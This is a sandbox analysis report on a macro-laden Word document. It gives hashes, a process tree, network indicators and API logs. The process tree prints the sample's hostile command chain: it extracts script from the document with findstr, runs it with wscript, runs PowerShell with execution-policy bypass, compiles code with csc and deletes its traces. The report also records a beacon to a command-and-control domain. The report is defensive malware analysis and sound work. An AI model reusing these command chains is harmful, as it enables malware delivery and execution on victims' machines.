Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	July 31, 2021, 1:50 p.m.	July 31, 2021, 1:52 p.m.

Size	874.4KB
Type	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 949, Author: User, Template: Normal.dotm, Last Saved By: User, Revision Number: 7, Name of Creating Application: Microsoft Office Word, Total Editing Time: 03:00, Create Time/Date: Wed Jul 28 00:35:00 2021, Last Saved Time/Date: Wed Jul 28 00:38:00 2021, Number of Pages: 18, Number of Words: 5848, Number of Characters: 33340, Security: 0
MD5	`ce866ae254de4cabd60a95abcc52c315`
SHA256	`fccad2fea7371ad24a1256b78165bceffc5d01a850f6e2ff576a2d8801ef94fa`
CRC32	`93188D3D`
ssdeep	`3072:1uPDUFXkzvSSoEMXO6TYeI+ehGpYQXyCpG4yWuQOGUjGsZNF+4sM02q92b6IcNUZ:s4GTSSozXO68eI+ZpGWubGsh8XX24Nj0`
Yara	Microsoft_Office_File_Zero - Microsoft Office File Antivirus - Contains references to security software Contains_VBA_macro_code - Detect a MS Office document with embedded VBA macro code [binaries]

WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office15\WINWORD.EXE" C:\Users\test22\AppData\Local\Temp\ce866ae254de4cabd60a95abcc52c315.doc
212
- cmd.exe cmd /c cd /d %USERPROFILE% && type "C:\Users\test22\AppData\Local\Temp\ce866ae254de4cabd60a95abcc52c315.doc" | findstr /r "^var" > y.js && wscript y.js "C:\Users\test22\AppData\Local\Temp\ce866ae254de4cabd60a95abcc52c315.doc"
  624
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" type "C:\Users\test22\AppData\Local\Temp\ce866ae254de4cabd60a95abcc52c315.doc" "
    1532
  - findstr.exe findstr /r "^var"
    1940
  - wscript.exe wscript y.js "C:\Users\test22\AppData\Local\Temp\ce866ae254de4cabd60a95abcc52c315.doc"
    2196
    - cmd.exe "C:\Windows\System32\cmd.exe" /c findstr /r "^dHJ5I" "C:\Users\test22\AppData\Local\Temp\ce866ae254de4cabd60a95abcc52c315.doc" > temp.txt
      1868
      - findstr.exe findstr /r "^dHJ5I" "C:\Users\test22\AppData\Local\Temp\ce866ae254de4cabd60a95abcc52c315.doc"
        1748
    - cmd.exe "C:\Windows\System32\cmd.exe" /c findstr /r "^QWRkL" "C:\Users\test22\AppData\Local\Temp\ce866ae254de4cabd60a95abcc52c315.doc" > temp.txt
      2368
      - findstr.exe findstr /r "^QWRkL" "C:\Users\test22\AppData\Local\Temp\ce866ae254de4cabd60a95abcc52c315.doc"
        2824
    - wscript.exe "C:\Windows\System32\wscript.exe" yy.js
      2872
    - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -f ./y.ps1
      2064
      - csc.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\jt6a_ory.cmdline"
        1784
        
        cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RES32BA.tmp" "c:\Users\test22\AppData\Local\Temp\CSC32AA.tmp"
        1964
      - cmd.exe cmd /c expand C:\Users\test22\AppData\Local\Temp\tmp3394.tmp -F:* C:\Users\test22\AppData\Local\Temp && del /q /f *.tmp
        460
        
        expand.exe expand C:\Users\test22\AppData\Local\Temp\tmp3394.tmp -F:* C:\Users\test22\AppData\Local\Temp
        1512
      - cmd.exe cmd /c cd /d %USERPROFILE% && del /f /q y.*
        2236

Name	Response	Post-Analysis Lookup
romanovawillkillyou.c1.biz	A 185.176.43.106	185.176.43.106

IP Address	Status	Action
164.124.101.2	Active	Moloch
185.176.43.106	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
UDP 192.168.56.103:57684 -> 164.124.101.2:53	2027863	ET INFO Observed DNS Query to .biz TLD	Potentially Bad Traffic
UDP 192.168.56.103:57684 -> 8.8.8.8:53	2027863	ET INFO Observed DNS Query to .biz TLD	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameW July 31, 2021, 1:50 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 31, 2021, 1:50 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 31, 2021, 1:50 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 31, 2021, 1:50 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA July 31, 2021, 1:50 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 31, 2021, 1:50 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent July 31, 2021, 1:50 p.m.			0	0

Command line console output was observed (50 out of 156 events)

Time & API	Arguments	Status	Return
WriteConsoleA July 31, 2021, 1:50 p.m.	buffer: FINDSTR: Line 3 is too long. console_handle: 0x0000000b	1	1
WriteConsoleA July 31, 2021, 1:50 p.m.	buffer: FINDSTR: Line 3 is too long. console_handle: 0x0000000b	1	1
WriteConsoleA July 31, 2021, 1:50 p.m.	buffer: FINDSTR: Line 3 is too long. console_handle: 0x0000000b	1	1
WriteConsoleA July 31, 2021, 1:50 p.m.	buffer: FINDSTR: Line 3 is too long. console_handle: 0x0000000b	1	1
WriteConsoleA July 31, 2021, 1:50 p.m.	buffer: FINDSTR: Line 3 is too long. console_handle: 0x0000000b	1	1
WriteConsoleA July 31, 2021, 1:50 p.m.	buffer: FINDSTR: Line 405 is too long. console_handle: 0x0000000b	1	1
WriteConsoleA July 31, 2021, 1:50 p.m.	buffer: FINDSTR: Line 405 is too long. console_handle: 0x0000000b	1	1
WriteConsoleA July 31, 2021, 1:50 p.m.	buffer: FINDSTR: Line 405 is too long. console_handle: 0x0000000b	1	1
WriteConsoleA July 31, 2021, 1:50 p.m.	buffer: FINDSTR: Line 405 is too long. console_handle: 0x0000000b	1	1
WriteConsoleA July 31, 2021, 1:50 p.m.	buffer: FINDSTR: Line 405 is too long. console_handle: 0x0000000b	1	1
WriteConsoleA July 31, 2021, 1:50 p.m.	buffer: FINDSTR: Line 1088 is too long. console_handle: 0x0000000b	1	1
WriteConsoleW July 31, 2021, 1:50 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\~DF1A25CA0483B5E8DA.TMP console_handle: 0x00000007	1	1
WriteConsoleW July 31, 2021, 1:50 p.m.	buffer: Access is denied. console_handle: 0x0000000b	1	1
WriteConsoleA July 31, 2021, 1:50 p.m.	buffer: M console_handle: 0x00000007	1	1
WriteConsoleA July 31, 2021, 1:50 p.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA July 31, 2021, 1:50 p.m.	buffer: c console_handle: 0x00000007	1	1
WriteConsoleA July 31, 2021, 1:50 p.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA July 31, 2021, 1:50 p.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA July 31, 2021, 1:50 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA July 31, 2021, 1:50 p.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA July 31, 2021, 1:50 p.m.	buffer: f console_handle: 0x00000007	1	1
WriteConsoleA July 31, 2021, 1:50 p.m.	buffer: t console_handle: 0x00000007	1	1
WriteConsoleA July 31, 2021, 1:50 p.m.	buffer: R console_handle: 0x00000007	1	1
WriteConsoleA July 31, 2021, 1:50 p.m.	buffer: F console_handle: 0x00000007	1	1
WriteConsoleA July 31, 2021, 1:50 p.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA July 31, 2021, 1:50 p.m.	buffer: l console_handle: 0x00000007	1	1
WriteConsoleA July 31, 2021, 1:50 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA July 31, 2021, 1:50 p.m.	buffer: E console_handle: 0x00000007	1	1
WriteConsoleA July 31, 2021, 1:50 p.m.	buffer: x console_handle: 0x00000007	1	1
WriteConsoleA July 31, 2021, 1:50 p.m.	buffer: p console_handle: 0x00000007	1	1
WriteConsoleA July 31, 2021, 1:50 p.m.	buffer: a console_handle: 0x00000007	1	1
WriteConsoleA July 31, 2021, 1:50 p.m.	buffer: n console_handle: 0x00000007	1	1
WriteConsoleA July 31, 2021, 1:50 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA July 31, 2021, 1:50 p.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA July 31, 2021, 1:50 p.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA July 31, 2021, 1:50 p.m.	buffer: n console_handle: 0x00000007	1	1
WriteConsoleA July 31, 2021, 1:50 p.m.	buffer: U console_handle: 0x00000007	1	1
WriteConsoleA July 31, 2021, 1:50 p.m.	buffer: t console_handle: 0x00000007	1	1
WriteConsoleA July 31, 2021, 1:50 p.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA July 31, 2021, 1:50 p.m.	buffer: l console_handle: 0x00000007	1	1
WriteConsoleA July 31, 2021, 1:50 p.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA July 31, 2021, 1:50 p.m.	buffer: t console_handle: 0x00000007	1	1
WriteConsoleA July 31, 2021, 1:50 p.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleA July 31, 2021, 1:50 p.m.	buffer: V console_handle: 0x00000007	1	1
WriteConsoleA July 31, 2021, 1:50 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA July 31, 2021, 1:50 p.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA July 31, 2021, 1:50 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA July 31, 2021, 1:50 p.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA July 31, 2021, 1:50 p.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA July 31, 2021, 1:50 p.m.	buffer: n console_handle: 0x00000007	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 84 events)

Time & API	Arguments	Status	Return
CryptExportKey July 31, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00438c30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004391f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004391f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004391f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00439530 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00439530 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00439530 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00439530 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00439530 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00439530 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00438f70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00438f70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00438f70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00438f70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00438f70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00438f70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004391f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00438f70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00438f70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00438f70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00438f70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00438f70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00438f70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00438f70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004388b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004388b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004388b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004388b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004388b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004388b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004388b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004388b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004388b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004388b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004388b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004388b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004388b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004388b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00438db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00438db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0056e940 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0056e940 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057ade0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057ae20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057ae60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057ada0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057ada0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057ada0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057ada0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057ada0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx July 31, 2021, 1:50 p.m.		1	1	0

Performs some HTTP requests (1 event)

request

GET http://romanovawillkillyou.c1.biz/index.php?user_id=417

Allocates read-write-execute memory (usually to unpack itself) (50 out of 140 events)

Time & API	Arguments	Status
NtProtectVirtualMemory July 31, 2021, 1:50 p.m.	process_identifier: 212 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6aaad000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 31, 2021, 1:50 p.m.	process_identifier: 212 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6a6be000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 31, 2021, 1:50 p.m.	process_identifier: 212 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x07caa000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 31, 2021, 1:50 p.m.	process_identifier: 212 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x07caa000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:50 p.m.	process_identifier: 2064 region_size: 1966080 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02550000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:50 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 31, 2021, 1:50 p.m.	process_identifier: 2064 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x69ad1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:50 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0233a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 31, 2021, 1:50 p.m.	process_identifier: 2064 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x69ad2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:50 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02332000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:50 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02342000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:50 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026f1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:50 p.m.	process_identifier: 2064 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026f2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:50 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0242a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:50 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02343000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:50 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02344000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:50 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0247b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:50 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02477000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:50 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0233b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:50 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02422000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:50 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02475000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:50 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02345000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:50 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0242c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:50 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ce0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:50 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02346000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:50 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0247c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:50 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02423000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:50 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02424000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:50 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02425000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:50 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02426000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:50 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02427000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:50 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02428000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:50 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02429000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:50 p.m.	process_identifier: 2064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e90000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
